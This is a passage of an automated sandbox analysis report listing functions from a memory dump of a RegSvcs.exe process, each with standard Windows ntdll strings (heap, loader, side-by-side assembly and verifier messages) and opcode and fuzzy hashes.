http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01698BD0
DefaultBrowser_NOPUBLISHERID, xrefs: 01698D00
services.exe, xrefs: 01698B96
smss.exe, xrefs: 01698B8B
svchost.exe, xrefs: 01698B68
SegmentHeap, xrefs: 01698BE9
heapType, xrefs: 01698BCB
runtimebroker.exe, xrefs: 01698B73
lsass.exe, xrefs: 01698BA1

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 62a3f5898e110b0a97e1fe03a93793b9030432120c31a548a4589374696a96cb
Instruction ID: 38779ee59c09126c4aa320304aea83f29d6ac5e3d8c321a493f72075e60b9889
Opcode Fuzzy Hash: 62a3f5898e110b0a97e1fe03a93793b9030432120c31a548a4589374696a96cb
Instruction Fuzzy Hash: F851E0721043499FCB29CF188C44BABBBECFF9A644F14091DEA59C7241E770D508CB92

Uniqueness

Uniqueness Score: -1.00%

Function 016A0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

RtlReAllocateHeap, xrefs: 016A02BF, 016A0362
Just reallocated block at %p to %Ix bytes, xrefs: 016A05F1
HEAP[%wZ]: , xrefs: 016A0399, 016A04A8, 016A05D0, 016A0675, 016A06CC
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 016A069F
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 016A04D3
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 016A06EA
HEAP: , xrefs: 016A03A6, 016A04B5, 016A05DD, 016A0682, 016A06D9
About to reallocate block at %p to %Ix bytes, xrefs: 016A03BA

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 1f543428f7331b0d80a38d79918e53941158bc6a7d2268323e1e9741c74c9879
Instruction ID: 6a56389ec2f2d299cd64e2519948cea2c38e482177c0f669b85f70334ace90b0
Opcode Fuzzy Hash: 1f543428f7331b0d80a38d79918e53941158bc6a7d2268323e1e9741c74c9879
Instruction Fuzzy Hash: 76D1B931A00696DFDB26DFA8C844AAABBF2FF4A704F488059E4859F352C734AD41CF54

Uniqueness

Uniqueness Score: -1.00%

Function 016789B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

VerifierFlags, xrefs: 01678C50
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01678A67
VerifierDebug, xrefs: 01678CA5
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01678A3D
HandleTraces, xrefs: 01678C8F
AVRF: -*- final list of providers -*- , xrefs: 01678B8F
VerifierDlls, xrefs: 01678CBD

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 850915e7f6ba586f61b5152611951c48b315cd7995ede1511223e524121e77ef
Instruction ID: abc6f70b3044a3aa85969ade6ec45ee411e84592be5d814096f79a8a2a419947
Opcode Fuzzy Hash: 850915e7f6ba586f61b5152611951c48b315cd7995ede1511223e524121e77ef
Instruction Fuzzy Hash: BD912472A05712AFD721EF6C8C88B2A7BE9BB94B28F04465CFA416F241D7709C01CB95

Uniqueness

Uniqueness Score: -1.00%

Function 015FEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

LdrpResSearchResourceInsideDirectory Exit, xrefs: 015FEB6C
R, xrefs: 015FEB62
T, xrefs: 015FEB4E
{, xrefs: 01654643
LdrpResSearchResourceInsideDirectory Enter, xrefs: 015FEB58
, xrefs: 015FF299

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: ebb89b3e2de0cb3fac7f414622f906beb4bb98b4bb5e68356fa73ef98fd8c7d9
Instruction ID: ff9cc841f2065d7eada68ed40ee72f3b02152182f44cf78accda8996e629ee9a
Opcode Fuzzy Hash: ebb89b3e2de0cb3fac7f414622f906beb4bb98b4bb5e68356fa73ef98fd8c7d9
Instruction Fuzzy Hash: AAA21875A0562A8FDB64DF19CC887ADBBB5FB45304F1542DADA09AB250EB309EC5CF00

Uniqueness

Uniqueness Score: -1.00%

Function 016263FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 0166413A
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 016641FE
Delaying execution failed with status 0x%08lx, xrefs: 01664258
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 016640D8
_LdrpInitialize, xrefs: 016640DF, 01664141, 01664205, 0166425F
minkernel\ntdll\ldrinit.c, xrefs: 016640E9, 0166414B, 0166420F, 01664269

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: f8fb67b3d1b24f3075d08cc3a005a4e1b71ebba2ddfc4aadd17b7d97b95757f6
Instruction ID: b5489c60090c34ec4363d801ec93518d46b71e2adf9f6da58ae8647a5e85ad32
Opcode Fuzzy Hash: f8fb67b3d1b24f3075d08cc3a005a4e1b71ebba2ddfc4aadd17b7d97b95757f6
Instruction Fuzzy Hash: E5912671B01726DBEB35DF58DC44BAA7BAABB50B14F20821DE9016F381DB709842CB95

Uniqueness

Uniqueness Score: -1.00%

Function 015E645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01649A2A
LdrpInitShimEngine, xrefs: 016499F4, 01649A07, 01649A30
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01649A01
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016499ED
apphelp.dll, xrefs: 015E6496
minkernel\ntdll\ldrinit.c, xrefs: 01649A11, 01649A3A

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: e79118c4f8d9371e6e3199fc098dc00f0bbaa9cf01b5f1204f222c24cbe48d1c
Instruction ID: ce18dcbdcee7c94eb007576d7303e8c268db41e0b83de53a9ab47c0654466ced
Opcode Fuzzy Hash: e79118c4f8d9371e6e3199fc098dc00f0bbaa9cf01b5f1204f222c24cbe48d1c
Instruction Fuzzy Hash: 1F51BF716483019FE725DF24CC45AAB77E9FB98788F00091EE9859F290D770E944CB96

Uniqueness

Uniqueness Score: -1.00%

Function 01622674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

RtlGetAssemblyStorageRoot, xrefs: 01662160, 0166219A, 016621BA
SXS: %s() passed the empty activation context, xrefs: 01662165
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01662180
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016621BF
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01662178
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0166219F

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 7d945e547a8cbd755042fc753ef109086239cf231de94d4ec797ac226b51fc96
Instruction ID: 4db0a1e9bb0138f3107d7793a7c07b2b58efe66cd577517bd3111e38458de911
Opcode Fuzzy Hash: 7d945e547a8cbd755042fc753ef109086239cf231de94d4ec797ac226b51fc96
Instruction Fuzzy Hash: 2A314836F04235BBF7218A9A8C61F6BBB7DEB64A51F05405DFB147B200D3709A01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0162C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 016681E5
LdrpInitializeProcess, xrefs: 0162C6C4
Loading import redirection DLL: '%wZ', xrefs: 01668170
LdrpInitializeImportRedirection, xrefs: 01668177, 016681EB
minkernel\ntdll\ldrredirect.c, xrefs: 01668181, 016681F5
minkernel\ntdll\ldrinit.c, xrefs: 0162C6C3

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 1d1a62aa0522781e537d48c05c0dcffe8ba2a348fba0b8a2a4bf3d55ab0b5328
Instruction ID: 0cf91ada59a05d8c345b3eca5554774775bc0757f71e7f5a425b1aa7b9b4effd
Opcode Fuzzy Hash: 1d1a62aa0522781e537d48c05c0dcffe8ba2a348fba0b8a2a4bf3d55ab0b5328
Instruction Fuzzy Hash: D431E2B16447169BC220EF69DD46E2AB7D9BF95B10F04065CF9806B391D620EC04CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0163096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01632DF0: LdrInitializeThunk.NTDLL ref: 01632DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01630BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01630BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01630D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01630D74

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: b2ce20a6c649cf5e4ca66c2b0c8990143f021f567fd7d9d26b3850e80e536ddc
Instruction ID: 473290420e6f254fece59fc007a8500c85838b2067eb42f3a5ca3d01b87bca17
Opcode Fuzzy Hash: b2ce20a6c649cf5e4ca66c2b0c8990143f021f567fd7d9d26b3850e80e536ddc
Instruction Fuzzy Hash: BF423A76A00715DFDB21CF68CC80BAAB7F9BF44314F1445ADE989AB241D770AA85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 015FA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 015FA3F7
LdrResFallbackLangList Exit, xrefs: 015FA3FF
LdrResFallbackLangList Enter, xrefs: 015FA3EF
8, xrefs: 015FA3E7

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 420e72fe568b460d148ef30213b04a2ed0477149bfecf2922ae4e60b7b133a31
Instruction ID: e5fcaa236d39cb57cd2d6afd58b47b86858bbba4df23b3e36777e9b3acaa38a5
Opcode Fuzzy Hash: 420e72fe568b460d148ef30213b04a2ed0477149bfecf2922ae4e60b7b133a31
Instruction Fuzzy Hash: 91C18A75508382CFD711CF58C488B6AB7E4BF84704F04496EFA9A8B251E774C949CB67

Uniqueness

Uniqueness Score: -1.00%

Function 01628402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 01628422
@, xrefs: 01628591
minkernel\ntdll\ldrinit.c, xrefs: 01628421
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0162855E

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: b12c8be38d2497e0aa223191c2f229f0aa8e3d7a7ab4c6b8b09535d35d5b0208
Instruction ID: b68f264f5dad9a4c161e8ad20d78f5e5d1e73833b859a2385fb3487644ba3d38
Opcode Fuzzy Hash: b12c8be38d2497e0aa223191c2f229f0aa8e3d7a7ab4c6b8b09535d35d5b0208
Instruction Fuzzy Hash: 6891BA71508755AFD722DF65CC81EABBAECBF94688F40092EFA8597241E330D904CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0162273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016621D9, 016622B1
SXS: %s() passed the empty activation context, xrefs: 016621DE
.Local, xrefs: 016228D8
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016622B6

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: a973fca0ebb8be779166d4a7e3387ab8ca1aef8e1caf38a2164d92465ace8a3e
Instruction ID: 99d3f0f333779f53fe304d2831f55ac05f52b691e90cba737c57831b596c6c18
Opcode Fuzzy Hash: a973fca0ebb8be779166d4a7e3387ab8ca1aef8e1caf38a2164d92465ace8a3e
Instruction Fuzzy Hash: 87A1BE31E0022A9BDB25CF69CC94BA9B3B5BF58314F1541EED908AB351D7709E81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01624AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

RtlDeactivateActivationContext, xrefs: 01663425, 01663432, 01663451
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01663437
SXS: %s() called with invalid flags 0x%08lx, xrefs: 0166342A
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01663456

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: aa3345ee7c80e3f63e36259397c6fd53afd481c9aaf50f3ce89092267a7b628e
Instruction ID: 484049c8226dcd57b71ce9f761ec6255c78f3d6ae6511430378997e0df1c54be
Opcode Fuzzy Hash: aa3345ee7c80e3f63e36259397c6fd53afd481c9aaf50f3ce89092267a7b628e
Instruction Fuzzy Hash: D161F136611A229BD722DF1DCC41B2AF7E9BF80B51F14852DE9599B381DB30E801CB95

Uniqueness

Uniqueness Score: -1.00%

Function 015F64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0165106B
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016510AE
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01651028
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01650FE5

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: a57f8b7fc6d4bf37ce994417e66e2afd6028d6966ed3c756a7ed9b7a53925fb1
Instruction ID: d386cab174b60365c705ad3979bed28835f67a789dbd51e7eebccebe5ae66580
Opcode Fuzzy Hash: a57f8b7fc6d4bf37ce994417e66e2afd6028d6966ed3c756a7ed9b7a53925fb1
Instruction Fuzzy Hash: 2371DEB19043059FCB21DF58CC88B9B7BE9AF95764F40046CFA488B246D734D588CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0161245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0165A992
apphelp.dll, xrefs: 01612462
LdrpDynamicShimModule, xrefs: 0165A998
minkernel\ntdll\ldrinit.c, xrefs: 0165A9A2

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 94824240c112b8093debefc6bcac51c9f9996b722c47ec8ef7cd5b6c140b7192
Instruction ID: dde0aac80b68f594ac2cc033691840c3587fdc4268226f29bcc60477b5a09d29
Opcode Fuzzy Hash: 94824240c112b8093debefc6bcac51c9f9996b722c47ec8ef7cd5b6c140b7192
Instruction Fuzzy Hash: 25316875A40202ABDB319F9DDC45AAA7BF5FB84B00F26025DED016F348C7705852CB90

Uniqueness

Uniqueness Score: -1.00%

Function 016029A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0160327D
HEAP[%wZ]: , xrefs: 01603255
HEAP: , xrefs: 01603264

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 34925d22d32e33f6bbe3ad5a2acf94c3510bdc9c5945e3c96666efd7fe31af9b
Instruction ID: d9337c532324d10e4a92b09d0b40afc0cc01470120fea4a731b46345a89f4d95
Opcode Fuzzy Hash: 34925d22d32e33f6bbe3ad5a2acf94c3510bdc9c5945e3c96666efd7fe31af9b
Instruction Fuzzy Hash: 9392DD71A046499FDB2ACF68C8547AEBBF1FF48304F18809DE849AB391D735A946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01600770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 016550AE
(UCRBlock->Size >= *Size), xrefs: 016550CA
HEAP: , xrefs: 016550BD

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 050fddfe3e7150557571320079a36a8959b15bd1c52705cfe932190865add7a5
Instruction ID: 5bfe50059a688b410413a3177096ee0f8673255d6c5c7973d492e286b40edce5
Opcode Fuzzy Hash: 050fddfe3e7150557571320079a36a8959b15bd1c52705cfe932190865add7a5
Instruction Fuzzy Hash: B5F19F30600606DFEB2ACF68CC94B6ABBF5FF45344F1481A9E9169B391D734E981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01616962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 0165CA51
@, xrefs: 01616C24

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: f69e0fed0c61deb64fb198997a915b5e7988e282fa0c9f1d8b1882486627c175
Instruction ID: 7c9ac884fac72ec90c557ba83f16eaa3e92c7ca741c36a08e38be97eff7030e9
Opcode Fuzzy Hash: f69e0fed0c61deb64fb198997a915b5e7988e282fa0c9f1d8b1882486627c175
Instruction Fuzzy Hash: 55C26D716083419FEB65CF28CC81BABBBE5AF88714F08892DE989C7345D774D845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 015EA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 0164C1E4
UseFilter, xrefs: 015EA1C1
FilterFullPath, xrefs: 0164C2E6

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: ef238f954d3dbb60853930779197eceef1f5f61abbbe7e6d496d249a3aa459f3
Instruction ID: 6b5bdb0c12d078c02106c8b2aad81779da3bd9be10011695687f3644d570cf43
Opcode Fuzzy Hash: ef238f954d3dbb60853930779197eceef1f5f61abbbe7e6d496d249a3aa459f3
Instruction Fuzzy Hash: 43A16B719026299BDB31DF68CC88BEAB7B8FF44704F1001E9EA09A7250E7359E85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01610BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

Failed to allocated memory for shimmed module list, xrefs: 0165A10F
LdrpCheckModule, xrefs: 0165A117
minkernel\ntdll\ldrinit.c, xrefs: 0165A121

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 9ed80659abe501f8229962e0b5b414fb570aa5438a6e530e7f358b7ac2451d39
Instruction ID: 02a435b77f4bf36b2dbd3204e42332cc64fd089e55456690f67b6d66b9154248
Opcode Fuzzy Hash: 9ed80659abe501f8229962e0b5b414fb570aa5438a6e530e7f358b7ac2451d39
Instruction Fuzzy Hash: A371ED75A002069FDF25DFA8CD80AAEB7F5FB84204F18416DE902EB355E735A982CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01600A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01655335
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0165534D
HEAP: , xrefs: 01655342

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: b1272f45a338308efc3333cb5d581f4035fd6f0381127141eba159b79d360c55
Instruction ID: f4b336c1b84825dad92f6e6b0d397ab32f988045df87d9b1de1257280a318a8b
Opcode Fuzzy Hash: b1272f45a338308efc3333cb5d581f4035fd6f0381127141eba159b79d360c55
Instruction Fuzzy Hash: F1619C716007069FDB2ACF28C884B6ABBE1FF45744F14856DE85A8F392D771E881CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0162C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 016682DE
Failed to reallocate the system dirs string !, xrefs: 016682D7
minkernel\ntdll\ldrinit.c, xrefs: 016682E8

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: f30098a7d9a5e100f1155cc0d36ed46182156b451f6a7da41c8c8ee1046ef5b2
Instruction ID: 47e45c8e2e1aea5e6bb917eb9f003b826d745ec7e4443423c978f284b0f67bf7
Opcode Fuzzy Hash: f30098a7d9a5e100f1155cc0d36ed46182156b451f6a7da41c8c8ee1046ef5b2
Instruction Fuzzy Hash: 9D41CEB1550721ABDB31EB68DC44B6B77E8AF98750F004A2EF9499B390E770D8108B96

Uniqueness

Uniqueness Score: -1.00%

Function 016AC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 016AC1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 016AC1C5
PreferredUILanguages, xrefs: 016AC212

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
